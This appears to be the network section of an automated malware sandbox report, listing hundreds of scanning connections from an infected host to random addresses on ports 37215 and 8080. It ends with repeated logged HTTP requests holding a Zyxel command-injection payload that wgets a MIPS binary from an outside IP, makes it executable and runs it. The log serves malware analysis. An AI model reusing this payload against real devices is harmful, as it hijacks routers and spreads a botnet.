            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.143.107.139:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.88.167.200:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 45.159.144.52:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.32.95.154:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.154.151.10:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.138.148.100:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.87.184.109:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 132.226.34.187:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.119.93.73:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.99.183.16:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.95.237.234:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.103.177.27:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.179.50.83:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.214.69.129:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.50.44.154:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.139.7.241:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.253.142.209:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.180.183.241:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.238.213.164:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.52.39.204:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 8.202.87.99:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 66.105.248.114:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.157.126.188:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.63.142.243:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.231.103.190:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.245.100.26:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.201.41.118:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.62.7.148:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.252.54.187:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.14.241.205:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.11.234.115:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.67.221.87:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.6.28.148:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.209.53.79:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.65.255.117:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.47.47.244:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.65.122.143:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.58.101.30:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.48.239.28:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 99.194.169.45:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.9.148.10:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.23.12.64:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.2.113.57:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.220.171.208:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.160.237.109:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 165.59.204.255:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.77.230.37:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.23.96.91:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.141.87.101:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.75.242.136:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 154.218.29.20:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.255.92.193:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.51.205.250:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.203.151.239:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.118.15.255:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 210.137.183.136:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.224.243.168:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.122.5.230:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.107.153.13:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.71.173.238:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.100.30.214:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.113.231.221:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 100.167.23.244:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.140.211.251:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.196.180.180:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.134.107.201:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.39.195.153:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.223.236.166:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.53.202.143:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.62.250.1:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.135.82.192:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.188.147.196:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.141.97.75:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.105.30.227:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.133.49.255:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.246.155.139:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 155.138.214.59:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.167.231.240:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.126.76.222:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.106.126.127:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 102.238.0.61:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.192.116.212:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 31.195.106.32:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.87.247.123:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.245.73.145:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.167.125.129:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.20.134.77:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.106.138.124:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.200.155.214:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.209.83.122:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.221.43.95:37215
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 154.148.226.113:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 213.49.95.102:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 186.164.81.115:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 185.124.0.196:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 191.31.168.132:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 194.105.232.141:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 40.146.67.23:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 180.75.41.210:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 23.18.118.152:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 139.222.235.20:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 41.136.125.12:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 202.84.99.149:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 161.18.94.93:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 175.246.209.207:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 130.38.95.215:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 223.227.214.155:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 112.45.40.201:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 70.219.75.239:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 85.219.218.63:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 19.149.147.45:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 183.126.219.215:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 178.113.9.81:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 120.206.5.215:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 109.192.153.66:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 154.25.174.138:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 138.78.209.59:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 141.29.206.18:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 23.207.81.138:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 198.63.246.218:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 213.44.205.168:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 119.2.213.140:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 82.177.163.198:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 63.233.117.213:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 218.150.246.166:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 124.21.102.14:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 62.93.244.212:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 18.36.197.199:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 125.5.147.6:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 113.86.234.54:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 65.238.250.153:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 179.169.171.211:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 123.30.30.165:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 207.50.195.243:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 208.10.230.150:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 62.51.61.120:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 142.171.159.236:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 1.178.180.139:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 206.160.230.45:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 174.52.175.142:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 14.199.106.131:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 53.233.247.23:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 219.185.234.163:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 152.117.94.165:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 145.80.247.193:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 36.151.76.185:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 193.129.176.172:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 75.153.24.4:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 93.249.164.27:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 50.36.121.63:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 71.222.153.179:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 94.194.94.104:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 208.206.55.216:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 121.242.215.237:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 100.227.228.34:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 143.175.207.120:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 203.104.92.28:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 144.35.251.152:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 187.216.238.130:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 49.118.138.164:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 13.253.14.28:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 145.174.172.121:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 72.151.242.179:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 42.82.27.252:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 123.177.208.109:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 223.12.168.140:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 12.118.25.242:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 91.245.216.79:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 90.127.123.42:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 20.167.224.216:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 204.210.111.141:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 40.236.130.226:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 14.191.94.139:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 79.176.139.93:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 99.226.29.247:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 5.117.246.189:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 49.3.78.164:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 188.218.117.119:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 40.22.83.51:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 71.178.240.119:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 207.70.115.177:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 46.83.42.116:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 209.200.63.243:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 195.163.29.217:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 34.177.137.42:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 116.166.89.31:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 97.151.219.169:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 51.118.169.42:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 209.197.215.109:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 164.73.1.95:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 146.226.219.10:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 94.207.227.226:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 122.19.180.88:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 63.131.104.213:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 38.254.254.135:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 148.105.229.135:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 48.219.105.183:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 112.77.180.68:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 83.99.224.208:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 222.240.97.227:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 121.80.77.154:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 175.123.85.59:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 165.196.217.151:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 89.134.191.149:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 81.113.148.28:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 134.232.96.146:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 98.176.237.163:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 130.51.71.140:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 17.110.127.48:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 5.105.120.62:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 218.255.151.232:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 36.221.170.122:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 132.192.94.50:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 223.196.118.187:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 116.184.11.0:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 184.24.9.65:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 173.159.160.240:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 19.134.124.222:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 220.203.126.103:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 212.34.221.153:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 52.51.35.96:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 144.140.248.240:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 23.116.133.161:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 73.171.238.179:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 158.253.118.109:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 141.250.41.238:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 222.26.192.131:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 209.170.63.159:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 118.64.59.58:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 51.106.43.66:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 167.54.173.199:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 93.7.100.13:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 115.153.215.233:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 103.38.254.21:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 200.189.97.66:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 106.51.187.122:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 220.200.87.47:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 36.180.46.211:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 68.142.246.92:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 209.4.79.145:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 162.80.143.221:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 1.91.52.116:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 43.83.208.79:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 5.119.59.156:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 154.220.206.40:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 221.124.25.149:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 147.251.54.191:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 157.97.73.179:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 61.75.79.60:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 170.154.140.133:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 64.23.217.246:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 158.251.36.244:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 62.18.81.143:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 97.74.49.7:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 95.88.56.40:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 23.184.194.130:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 185.31.232.1:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 216.146.58.150:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 217.117.198.234:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 153.115.231.251:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 13.162.207.51:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 212.129.202.130:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 119.111.70.81:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 163.148.112.115:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 67.115.208.14:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 31.146.230.147:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 142.111.8.156:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 44.185.29.164:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 207.173.215.22:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 188.73.204.0:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 4.141.228.198:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 202.223.89.9:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 155.78.177.68:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 165.147.245.70:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 130.215.18.33:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 202.72.255.195:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 2.135.59.223:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 17.254.169.228:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 117.208.88.119:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 52.214.115.158:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 153.151.4.108:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 187.75.238.86:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 213.106.241.66:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 217.52.129.145:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 25.36.77.244:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 186.160.75.227:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 107.180.115.64:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 99.110.210.233:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 220.35.202.164:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 44.75.231.252:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 69.194.159.1:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 199.215.131.161:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 87.236.227.181:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 99.207.95.17:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 61.66.254.19:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 169.158.139.59:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 131.200.80.168:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 95.163.243.106:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 203.114.246.159:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 58.100.79.227:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 141.17.41.7:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 169.128.2.71:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 48.86.59.242:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 69.123.167.71:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 115.130.204.243:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 67.107.3.109:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 58.186.98.212:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 196.54.238.145:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 170.182.222.249:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 74.152.53.69:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 46.38.224.170:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 57.62.120.46:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 154.120.48.54:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 198.207.163.151:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 146.84.104.183:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 121.27.150.31:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 82.151.42.166:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 48.75.237.226:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 125.255.239.209:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 219.241.12.88:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 105.89.189.157:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 4.244.75.210:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 126.33.11.46:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 101.1.190.87:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 58.68.95.21:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 131.45.83.153:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 90.138.191.144:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 171.146.148.146:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 194.214.194.44:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 203.247.73.40:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 106.3.129.51:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 37.66.5.103:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 110.231.159.30:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 166.224.241.15:8080
            Source: global trafficTCP traffic: 192.168.2.13:34986 -> 113.57.249.106:8080
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
